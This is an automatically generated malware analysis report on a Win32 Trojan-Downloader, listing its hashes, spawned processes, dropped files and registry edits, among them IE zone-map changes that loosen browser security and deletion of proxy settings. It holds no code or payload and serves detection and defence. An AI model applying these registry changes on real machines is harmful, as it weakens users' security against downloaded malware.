Trojan-Downloader.Win32.Adload.efgf (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6acad04bb03501dc920778ed12ba6d63
SHA1: 8742d5aa6108e0142c9511ccb2bd49040791ce3d
SHA256: 383790bd98ec2787bf57fa7e9db4e0ac11355cca830e85104222d447e8320ddf
SSDeep: 98304:lQPSI bq48LiQ9F4yrJ/KRLuDN8OZPYJFyc74yZhhgFl39:m4g5PZZ8OZPU1MchMlN
Size: 3645088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: ????
Created at: 2014-07-09 10:58:13
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-Downloader creates the following process(es):
attrib.exe:1168
attrib.exe:1520
%original file name%.exe:2040
riliquicken.exe:408
6acad04bb03501dc920778ed12ba6d63.tmp:560
uCalendar.exe:1840
The Trojan-Downloader injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:2040 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (7386 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (0 bytes)
The process riliquicken.exe:408 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
%Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CQ2G0.tmp (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H454P.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNLME.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V0GI3.tmp (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6MUOK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K6A4L.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J3A1P.tmp (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R3ENI.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OT7F7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE59E.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N9TNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F3GLM.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RPQTQ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1BO97.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-EIJBG.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-224GL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16KT2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-457SG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0RAC9.tmp (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L9R13.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VC40Q.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-134QI.tmp (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-12F6F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EPU0G.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GR1F1.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J635K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-0RK1D.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0QAU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U8HBE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8CE4A.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-FG2A2.tmp (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LK4FU.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V625H.tmp (348 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-89JKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-54RS6.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PVBA9.tmp (930 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-LQKHS.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-91HFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7V3M5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RR67N.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D5SAM.tmp (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T93Q7.tmp (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2QH3K.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UEO5K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-412CP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3HB2E.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7AIGQ.tmp (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6C897.tmp (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2JDM2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RAN83.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-01GK7.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NU9MK.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D7GKR.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G4QOL.tmp (423 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L2QRQ.tmp (998 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D9EF4.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJMC9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8SQ3K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ICSK7.tmp (442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B1VSJ.tmp (565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H6UDG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-PL60I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q5IHQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q9602.tmp (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6U4PP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3OV3S.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIQHK.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5OQO8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ARCFV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD23K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U58P4.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SFKB5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V4CEI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B3HA8.tmp (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (1434 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GNV8E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6FEFD.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-776D0.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-5H9QJ.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S6Q82.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16QRI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SLEVI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ABKJC.tmp (956 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3B5UH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TVVUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S26CD.tmp (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-CI790.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-94MCM.tmp (586 bytes)
%Documents and Settings%\All Users\Desktop\ Intener Hao123.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DASMI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8FIHU.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-Q84VT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PGQ9B.tmp (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OQ3T0.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99VDN.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-3G7MO.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CJ1R8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-U404O.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKH3C.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GQB0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2FA4J.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6J672.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9UI34.tmp (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5B0J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S95AA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IT5G9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K8C4N.tmp (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GH8V2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8O12A.tmp (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TMDND.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-D9BCS.tmp (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VJS7P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NCEGP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VFH95.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MQF6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (2149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPNA1.tmp (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NML75.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IBNEQ.tmp (18 bytes)
%Documents and Settings%\All Users\Desktop\å°Â新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V509A.tmp (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-POHV2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4EA8J.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NICBF.tmp (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAK3A.tmp (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-394GB.tmp (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å°Â新日历\å¸载 å°Â新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G0SMU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\icon_9[1].gif (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CIVFE.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RERKV.tmp (530 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJF6C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-C4IKR.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RK743.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7UBNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3LIFE.tmp (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-598FD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EEJC5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-41LLL.tmp (479 bytes)
The Trojan-Downloader deletes the following file(s):
The process uCalendar.exe:1840 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
Registry activity
The process attrib.exe:1168 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 DB 8B 12 66 3B 4D 33 95 DE ED CD 46 BE 3F FB"
The process attrib.exe:1520 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 3A 42 A7 98 7C 2C 0D 03 4B 55 72 B4 FF 7E D2"
The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 89 95 9B 57 C9 6B C2 15 31 91 49 C9 D6 CE 8D"
The process riliquicken.exe:408 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB CF F8 7B EE 10 97 81 09 CD AE 07 4A 91 EC 3D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE security zone settings to map all local web-nodes whose names contain no dots and that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 6acad04bb03501dc920778ed12ba6d63.tmp:560 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Icon Group" = "小新日历"
"Publisher" = "小新日历"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"InstallDate" = "20150114"
